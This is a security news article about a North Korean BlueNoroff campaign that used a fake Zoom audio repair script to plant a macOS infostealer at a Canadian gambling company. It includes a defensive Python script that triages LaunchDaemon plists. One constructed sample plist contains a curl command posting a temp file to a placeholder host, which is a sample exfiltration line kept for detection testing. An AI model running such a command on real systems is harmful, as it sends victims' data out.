A Canadian online gambling provider has fallen victim to a highly targeted cyberattack involving a fake Zoom support tool, part of a broader social engineering campaign orchestrated by BlueNoroff, a financially motivated North Korean APT subgroup tied to the Lazarus Group.
Investigators from Field Effect Analysis revealed that the incident began on 28 May 2025, during what appeared to be a routine Zoom call between the victim and a known contact. When audio issues arose, the victim was urged to run a so-called Zoom audio repair script, actually a malicious payload disguised to blend seamlessly into the victim’s workflow.
The attackers had impersonated both the Zoom brand and trusted business contacts using spoofed domains, including the fraudulent zoom-tech[.]us, which had been recently registered and linked to other suspicious infrastructure. The aim: exploit environments where speed and routine dominate, making it easier to bypass scrutiny.
Once executed, the script triggered a chain of downloads and commands. The malware prompted the user to enter system credentials and quietly installed a series of malicious payloads. Persistence was established using macOS LaunchDaemons, with components masquerading as legitimate system processes.
The infostealer malware quickly got to work, exfiltrating sensitive data including system information, keychain credentials, browser profiles (particularly those tied to cryptocurrency use, such as Brave), and messaging app data from platforms such as Telegram. Exfiltration occurred using curl commands, with data leaving the victim’s system before the malware was fully embedded.
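The two traits the report describes, a LaunchDaemon whose name mimics an Apple service and a daemon that shells out to curl, are both visible in the plist itself. As an added defender-side illustration (not code from the report or from Field Effect), the script below triages LaunchDaemon plists with those heuristics; the two sample plists, the hostname example.invalid and the file paths are constructed for the example and are not indicators from the incident.

```python
import plistlib
import re
from typing import Dict, List

# Constructed sample plists (not artefacts from the incident): an Apple-look-alike label that calls curl, and a plain vendor updater.
SAMPLE_PLISTS: Dict[str, bytes] = {
    "/Library/LaunchDaemons/com.apple.audiod.helper.plist": b"""<plist version="1.0"><dict>
<key>Label</key><string>com.apple.audiod.helper</string>
<key>ProgramArguments</key><array><string>/bin/sh</string><string>-c</string>
<string>/usr/bin/curl -s -X POST --data-binary @/tmp/.out https://example.invalid/up</string></array>
<key>RunAtLoad</key><true/><key>KeepAlive</key><true/></dict></plist>""",
    "/Library/LaunchDaemons/com.vendor.updater.plist": b"""<plist version="1.0"><dict>
<key>Label</key><string>com.vendor.updater</string>
<key>ProgramArguments</key><array><string>/Library/Application Support/Vendor/updater</string>
<string>--check</string></array><key>RunAtLoad</key><true/></dict></plist>""",
}

# Where genuine Apple daemons live; a com.apple.* label loaded from anywhere else is a red flag.
APPLE_DAEMON_DIR = "/System/Library/LaunchDaemons/"
# Locations an unprivileged user or a downloaded "repair script" can write to.
USER_WRITABLE = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/", "/private/var/folders/")
CURL_RE = re.compile(r"(^|[\s/])curl(\s|$)")


def triage_plist(path: str, raw: bytes) -> List[str]:
    """Return human-readable findings for one LaunchDaemon plist (empty list = nothing odd)."""
    d = plistlib.loads(raw)
    label = str(d.get("Label", ""))
    args = [str(a) for a in d.get("ProgramArguments", [])] or [str(d.get("Program", ""))]
    cmdline = " ".join(args)
    findings = []
    if label.startswith("com.apple.") and not path.startswith(APPLE_DAEMON_DIR):
        findings.append(f"Apple-style label {label!r} loaded from outside {APPLE_DAEMON_DIR}")
    if CURL_RE.search(cmdline):
        findings.append("daemon invokes curl (possible download or exfiltration channel)")
    if any(tok.startswith(USER_WRITABLE) for tok in re.split(r"[\s@]+", cmdline)):
        findings.append("command line references a user-writable path")
    if d.get("RunAtLoad") and d.get("KeepAlive"):
        findings.append("RunAtLoad+KeepAlive: launchd restarts it if it is killed")
    return findings


def triage_all(plists: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Map each plist path to its findings, keeping only plists with at least one."""
    return {p: f for p, f in ((p, triage_plist(p, raw)) for p, raw in plists.items()) if f}


if __name__ == "__main__":
    print(triage_all(SAMPLE_PLISTS))
```

On a live host, feed it the bytes of each file under /Library/LaunchDaemons and /Library/LaunchAgents instead of SAMPLE_PLISTS; the heuristics are a triage aid, so every hit still needs a look at the referenced binary or script.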
Javvad Malik, Lead Security Awareness Advocate at KnowBe4, says: “The emergence of this sophisticated social engineering campaign, leveraging the trusted Zoom platform, highlights the ongoing use of legitimate services and brands to social engineer victims.”
He adds that as remote work remains prevalent, organizations must adapt their security strategies to address these evolving threats. “The financial and operational risks posed by such attacks necessitate a proactive approach to cybersecurity, encompassing both technological solutions and human-centric security awareness.
“Technology cannot block lookalike websites or services; users should be made aware of these risks and how to identify red flags with tools, and in particular social engineering tactics used to pressure unsuspecting victims into downloading malicious files.”
Malik says that if someone does fall victim and downloads a file, local controls should prevent or limit its ability to execute.
Information Security Buzz News Editor
Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.